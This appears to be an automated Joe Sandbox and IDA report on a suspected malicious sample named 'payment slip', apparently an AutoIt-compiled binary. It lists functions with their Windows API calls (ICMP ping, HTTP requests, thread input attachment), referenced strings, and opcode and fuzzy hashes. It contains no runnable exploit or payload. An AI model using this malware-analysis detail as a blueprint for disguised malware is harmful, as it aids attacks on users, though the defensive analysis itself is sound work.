                                        • String ID:
                                        • API String ID: 541375521-0
                                        • Opcode ID: f149451a9e4a68ea03f1a538d7f5f1475838c0241219f06aa78dac18e236bcbb
                                        • Instruction ID: 8395430a7d9abd82758272c9ee139d26679bb37e314f5df6033502a2c8c37088
                                        • Opcode Fuzzy Hash: f149451a9e4a68ea03f1a538d7f5f1475838c0241219f06aa78dac18e236bcbb
                                        • Instruction Fuzzy Hash: 60412A70505BC96DFFB087A8C8447B5BEE06F12344F08805EDAC6565C2EBE59DC8D7A2
                                        APIs
                                        • WSAStartup.WSOCK32(00000101,?), ref: 000B05BC
                                        • inet_addr.WSOCK32(?), ref: 000B061C
                                        • gethostbyname.WSOCK32(?), ref: 000B0628
                                        • IcmpCreateFile.IPHLPAPI ref: 000B0636
                                        • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 000B06C6
                                        • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 000B06E5
                                        • IcmpCloseHandle.IPHLPAPI(?), ref: 000B07B9
                                        • WSACleanup.WSOCK32 ref: 000B07BF
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                        • String ID: Ping
                                        • API String ID: 1028309954-2246546115
                                        • Opcode ID: 730eb790df2df87b842af56706b7dab3d880ea830eaac3eb0c3e75037532ac91
                                        • Instruction ID: 7ce1caf11426689a9e9e45dfbddc4ec291889288772abec49b16a563077bf483
                                        • Opcode Fuzzy Hash: 730eb790df2df87b842af56706b7dab3d880ea830eaac3eb0c3e75037532ac91
                                        • Instruction Fuzzy Hash: F5918E75A086019FD320CF15C888F5BBBE4EF84318F1485A9F4698B6A2CB34ED45CF91
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: _wcslen$BuffCharLower
                                        • String ID: cdecl$none$stdcall$winapi
                                        • API String ID: 707087890-567219261
                                        • Opcode ID: a9ed6dc3086c4a97938f4513d96c98ec5ae6795f06965579ade3c838a506fef8
                                        • Instruction ID: 0d4d7337f921ac23cd4219ae1e1ab9611e883a0ca561204241412b627afecf51
                                        • Opcode Fuzzy Hash: a9ed6dc3086c4a97938f4513d96c98ec5ae6795f06965579ade3c838a506fef8
                                        • Instruction Fuzzy Hash: CE51B131A041169BCF24DF68C9519FEB7E9BF64324B21822AE926E72D5DF31DD40C790
                                        APIs
                                        • CoInitialize.OLE32 ref: 000B3774
                                        • CoUninitialize.OLE32 ref: 000B377F
                                        • CoCreateInstance.OLE32(?,00000000,00000017,000CFB78,?), ref: 000B37D9
                                        • IIDFromString.OLE32(?,?), ref: 000B384C
                                        • VariantInit.OLEAUT32(?), ref: 000B38E4
                                        • VariantClear.OLEAUT32(?), ref: 000B3936
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize
                                        • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                        • API String ID: 636576611-1287834457
                                        • Opcode ID: 64deefd4dddc558b5d281da08cb35de169c8d702cea7ebef0149cf2b69857f35
                                        • Instruction ID: 626913a9bfbe5f21e2d1492cf5d289d7a788ed92f3803b082cfa81f78115d974
                                        • Opcode Fuzzy Hash: 64deefd4dddc558b5d281da08cb35de169c8d702cea7ebef0149cf2b69857f35
                                        • Instruction Fuzzy Hash: 446190B1608711AFD721DF54C889FAEB7E8EF49710F204819F5859B291DB70EE48CB92
                                        APIs
                                          • Part of subcall function 00049BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00049BB2
                                          • Part of subcall function 0004912D: GetCursorPos.USER32(?), ref: 00049141
                                          • Part of subcall function 0004912D: ScreenToClient.USER32(00000000,?), ref: 0004915E
                                          • Part of subcall function 0004912D: GetAsyncKeyState.USER32(00000001), ref: 00049183
                                          • Part of subcall function 0004912D: GetAsyncKeyState.USER32(00000002), ref: 0004919D
                                        • ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?,?,?), ref: 000C8B6B
                                        • ImageList_EndDrag.COMCTL32 ref: 000C8B71
                                        • ReleaseCapture.USER32 ref: 000C8B77
                                        • SetWindowTextW.USER32(?,00000000), ref: 000C8C12
                                        • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 000C8C25
                                        • DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?,?,?), ref: 000C8CFF
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
                                        • String ID: U$@GUI_DRAGFILE$@GUI_DROPID
                                        • API String ID: 1924731296-2763321216
                                        • Opcode ID: 1b5d91e89ebba16d824fe12e1f9686d182b12cb767a37095dc2c8d1769d24cf0
                                        • Instruction ID: 5e1dfe9bfd51562a1d7af3c8c0aeb259a0ee0f54fab25b2dca99447a9619759e
                                        • Opcode Fuzzy Hash: 1b5d91e89ebba16d824fe12e1f9686d182b12cb767a37095dc2c8d1769d24cf0
                                        • Instruction Fuzzy Hash: E1514971104304AFE704DF24D996FAE77E4FB88714F400A2DF996A72E2DBB49944CB62
                                        APIs
                                        • LoadStringW.USER32(00000066,?,00000FFF,?), ref: 000A33CF
                                          • Part of subcall function 00039CB3: _wcslen.LIBCMT ref: 00039CBD
                                        • LoadStringW.USER32(00000072,?,00000FFF,?), ref: 000A33F0
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: LoadString$_wcslen
                                        • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
                                        • API String ID: 4099089115-3080491070
                                        • Opcode ID: b01ab50f5b08ba184a5cca2f5884beff172fdce69bf869727634d4e31409196c
                                        • Instruction ID: f1496586ec337dbdcd529c3b64e392e7141f15e77337846516c837ee56053849
                                        • Opcode Fuzzy Hash: b01ab50f5b08ba184a5cca2f5884beff172fdce69bf869727634d4e31409196c
                                        • Instruction Fuzzy Hash: 5A517C71D00209BADF16EBE4CD46EEEB7B8AF05340F104165F605760A2EB752F98DB61
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: _wcslen$BuffCharUpper
                                        • String ID: APPEND$EXISTS$KEYS$REMOVE
                                        • API String ID: 1256254125-769500911
                                        • Opcode ID: 316413cb8cc671821179b09e6cbb014a7acacc6bffa2c908cc45652922724596
                                        • Instruction ID: d5867ef3fc190abdd571cf2aa017a74bcb2c4e47defc9fa5d5652e14097cbf31
                                        • Opcode Fuzzy Hash: 316413cb8cc671821179b09e6cbb014a7acacc6bffa2c908cc45652922724596
                                        • Instruction Fuzzy Hash: 4A412B32A041269BCF206F7DDE905BEB7E5AFA0774B244229E421D7280E739DC81E390
                                        APIs
                                        • SetErrorMode.KERNEL32(00000001), ref: 000A53A0
                                        • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 000A5416
                                        • GetLastError.KERNEL32 ref: 000A5420
                                        • SetErrorMode.KERNEL32(00000000,READY), ref: 000A54A7
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: Error$Mode$DiskFreeLastSpace
                                        • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                        • API String ID: 4194297153-14809454
                                        • Opcode ID: 17620e79c3a0260d245b625641d8cf7548bc84e0e6dc5e9fa93c6b96e812faff
                                        • Instruction ID: 66819cbebef694e858e2ca37cd2b9ae7902e006be29334b736b8615c65e991d8
                                        • Opcode Fuzzy Hash: 17620e79c3a0260d245b625641d8cf7548bc84e0e6dc5e9fa93c6b96e812faff
                                        • Instruction Fuzzy Hash: A631BF35A006089FD710DFA8C884EEEBBF4FB0A30AF188065E505CB692D775DD82CB90
                                        APIs
                                        • GetCurrentThreadId.KERNEL32 ref: 0009B151
                                        • GetForegroundWindow.USER32(00000000,?,?,?,?,?,0009A1E1,?,00000001), ref: 0009B165
                                        • GetWindowThreadProcessId.USER32(00000000), ref: 0009B16C
                                        • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,0009A1E1,?,00000001), ref: 0009B17B
                                        • GetWindowThreadProcessId.USER32(?,00000000), ref: 0009B18D
                                        • AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,0009A1E1,?,00000001), ref: 0009B1A6
                                        • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,0009A1E1,?,00000001), ref: 0009B1B8
                                        • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,0009A1E1,?,00000001), ref: 0009B1FD
                                        • AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,0009A1E1,?,00000001), ref: 0009B212
                                        • AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,0009A1E1,?,00000001), ref: 0009B21D
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                         • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                        • String ID:
                                        • API String ID: 2156557900-0
                                        • Opcode ID: 1e75a74ff7a7271e150d5b5de671644b5ec4486076cfd4fe0afc06b0c78acf45
                                        • Instruction ID: 14e7ee39502febb726976733fb1d63dd75bb84080a407254d371e969a994cd8f
                                        • Opcode Fuzzy Hash: 1e75a74ff7a7271e150d5b5de671644b5ec4486076cfd4fe0afc06b0c78acf45
                                        • Instruction Fuzzy Hash: 1F31AD71504204BFEF209F28EE48F6DBBADFB51325F104009FA55D6190D7B8AE819F60
                                        APIs
                                        • _free.LIBCMT ref: 00062C94
                                          • Part of subcall function 000629C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0006D7D1,00000000,00000000,00000000,00000000,?,0006D7F8,00000000,00000007,00000000,?,0006DBF5,00000000), ref: 000629DE
                                          • Part of subcall function 000629C8: GetLastError.KERNEL32(00000000,?,0006D7D1,00000000,00000000,00000000,00000000,?,0006D7F8,00000000,00000007,00000000,?,0006DBF5,00000000,00000000), ref: 000629F0
                                        • _free.LIBCMT ref: 00062CA0
                                        • _free.LIBCMT ref: 00062CAB
                                        • _free.LIBCMT ref: 00062CB6
                                        • _free.LIBCMT ref: 00062CC1
                                        • _free.LIBCMT ref: 00062CCC
                                        • _free.LIBCMT ref: 00062CD7
                                        • _free.LIBCMT ref: 00062CE2
                                        • _free.LIBCMT ref: 00062CED
                                        • _free.LIBCMT ref: 00062CFB
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                         • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: _free$ErrorFreeHeapLast
                                        • String ID:
                                        • API String ID: 776569668-0
                                        • Opcode ID: f5bd0660625df2dcfeb3c718c0aee2854385dafe0c9f5fdd918915cbccc42b5d
                                        • Instruction ID: 053ce59edaa254d97d7cd6f8cd65d2b17eb2e6fdaf406fe36c15ef6296b839d0
                                        • Opcode Fuzzy Hash: f5bd0660625df2dcfeb3c718c0aee2854385dafe0c9f5fdd918915cbccc42b5d
                                        • Instruction Fuzzy Hash: 7B117476600508BFCB06EF54D982CDD3BA6FF45390F5145A5FA489F223DA31EE509BA0
                                        APIs
                                        • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00031459
                                        • OleUninitialize.OLE32(?,00000000), ref: 000314F8
                                        • UnregisterHotKey.USER32(?), ref: 000316DD
                                        • DestroyWindow.USER32(?), ref: 000724B9
                                        • FreeLibrary.KERNEL32(?), ref: 0007251E
                                        • VirtualFree.KERNEL32(?,00000000,00008000), ref: 0007254B
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                         • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                        • String ID: close all
                                        • API String ID: 469580280-3243417748
                                        • Opcode ID: a7027f5cc0c8157102a974bf9a039e301d731e712a6132b0bfd37e181152627b
                                        • Instruction ID: 45a45f337461acfdfce95a123900eb8885fc5162517d4afc9d8b8ada80eca661
                                        • Opcode Fuzzy Hash: a7027f5cc0c8157102a974bf9a039e301d731e712a6132b0bfd37e181152627b
                                        • Instruction Fuzzy Hash: 2AD16E31B01212CFDB2AEF55C499FA9F7A4BF09700F1582ADE44A6B252CB34AD12CF54
                                        APIs
                                        • SetWindowLongW.USER32(?,000000EB), ref: 00035C7A
                                          • Part of subcall function 00035D0A: GetClientRect.USER32(?,?), ref: 00035D30
                                          • Part of subcall function 00035D0A: GetWindowRect.USER32(?,?), ref: 00035D71
                                          • Part of subcall function 00035D0A: ScreenToClient.USER32(?,?), ref: 00035D99
                                        • GetDC.USER32 ref: 000746F5
                                        • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00074708
                                        • SelectObject.GDI32(00000000,00000000), ref: 00074716
                                        • SelectObject.GDI32(00000000,00000000), ref: 0007472B
                                        • ReleaseDC.USER32(?,00000000), ref: 00074733
                                        • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 000747C4
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                         • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                        • String ID: U
                                        • API String ID: 4009187628-3372436214
                                        • Opcode ID: 1109d89cfcf4bdc3fbf5e5355325635cb401d4a6e267661854a5670f982e24b6
                                        • Instruction ID: 6fe5d15eacc0f349a28cab3f4900633199e832419099ac738d5fb3f71e6dcae8
                                        • Opcode Fuzzy Hash: 1109d89cfcf4bdc3fbf5e5355325635cb401d4a6e267661854a5670f982e24b6
                                        • Instruction Fuzzy Hash: 5671DD34804205DFCF268F64CD84EBE3BF5FF4A325F188269E9595A2A6C7389881DF51
                                        APIs
                                        • LoadStringW.USER32(00000066,?,00000FFF,00000000), ref: 000A35E4
                                          • Part of subcall function 00039CB3: _wcslen.LIBCMT ref: 00039CBD
                                        • LoadStringW.USER32(00102390,?,00000FFF,?), ref: 000A360A
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                         • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: LoadString$_wcslen
                                        • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                        • API String ID: 4099089115-2391861430
                                        • Opcode ID: 5b0cd7c3a6b6f96c2ed1a91b16595e98f2a0139e9b8067583694097ddfd741ed
                                        • Instruction ID: b08159f9a6970f7f2e0b40ba690a08b060010352866397118bb640d68c039506
                                        • Opcode Fuzzy Hash: 5b0cd7c3a6b6f96c2ed1a91b16595e98f2a0139e9b8067583694097ddfd741ed
                                        • Instruction Fuzzy Hash: D2516E71804209BBDF15EBE0CC82EEDBB78AF05310F145125F205761A2EB711B99DFA1
                                        APIs
                                        • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 000C2E1C
                                        • GetWindowLongW.USER32(00000000,000000F0), ref: 000C2E4F
                                        • GetWindowLongW.USER32(00000000,000000F0), ref: 000C2E84
                                        • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 000C2EB6
                                        • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 000C2EE0
                                        • GetWindowLongW.USER32(00000000,000000F0), ref: 000C2EF1
                                        • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 000C2F0B
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                         • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: LongWindow$MessageSend
                                        • String ID: U
                                        • API String ID: 2178440468-2399391058
                                        • Opcode ID: 1aa9a49f9c48789d2784677678f9270c1a96196d69e8039003f4ed91f2984738
                                        • Instruction ID: fded0992901986a0799d2a031e37539e638682828adea777a45f589bbb35ad06
                                        • Opcode Fuzzy Hash: 1aa9a49f9c48789d2784677678f9270c1a96196d69e8039003f4ed91f2984738
                                        • Instruction Fuzzy Hash: BA313530604254AFEB20DF18DC84FA937E0FB9A710F150168F944AFAB2CBB5AC80DB00
                                        APIs
                                        • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 000AC272
                                        • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 000AC29A
                                        • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 000AC2CA
                                        • GetLastError.KERNEL32 ref: 000AC322
                                        • SetEvent.KERNEL32(?), ref: 000AC336
                                        • InternetCloseHandle.WININET(00000000), ref: 000AC341
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                         • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                        • String ID:
                                        • API String ID: 3113390036-3916222277
                                        • Opcode ID: f60c3c1cfd8f59c054cb2cfcac2b7c68ad2f581e155bf8fa0e3c816f3ef7c0e4
                                        • Instruction ID: eabc88df7c123f4bff00898a0ba863c7d2f8aec66835cf218a385abb8559e2b1
                                        • Opcode Fuzzy Hash: f60c3c1cfd8f59c054cb2cfcac2b7c68ad2f581e155bf8fa0e3c816f3ef7c0e4
                                        • Instruction Fuzzy Hash: 60317FB2504604AFFB219FA4CC88EAB7BFCEB4A744F15851EF44AD6201DB34DE059B60
                                        APIs
                                        • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,00073AAF,?,?,Bad directive syntax error,000CCC08,00000000,00000010,?,?,>>>AUTOIT SCRIPT<<<), ref: 000998BC
                                        • LoadStringW.USER32(00000000,?,00073AAF,?), ref: 000998C3
                                          • Part of subcall function 00039CB3: _wcslen.LIBCMT ref: 00039CBD
                                        • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 00099987
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                         • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: HandleLoadMessageModuleString_wcslen
                                        • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                        • API String ID: 858772685-4153970271
                                        • Opcode ID: a40d99266a86a25b4a17446ef30ddc9027e11f67eb4a331e607e2c257ba57892
                                        • Instruction ID: e4d4b2ba0b96a9902762ca0244648191305d79230c6f3da5b4bd9ef137bff797
                                        • Opcode Fuzzy Hash: a40d99266a86a25b4a17446ef30ddc9027e11f67eb4a331e607e2c257ba57892
                                        • Instruction Fuzzy Hash: 59215E3184021EABDF16AF94CC46EEE7779FF18300F044469F619660A2EB75AA18EB50
                                        APIs
                                        • GetParent.USER32 ref: 000920AB
                                        • GetClassNameW.USER32(00000000,?,00000100), ref: 000920C0
                                        • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 0009214D
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                         • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
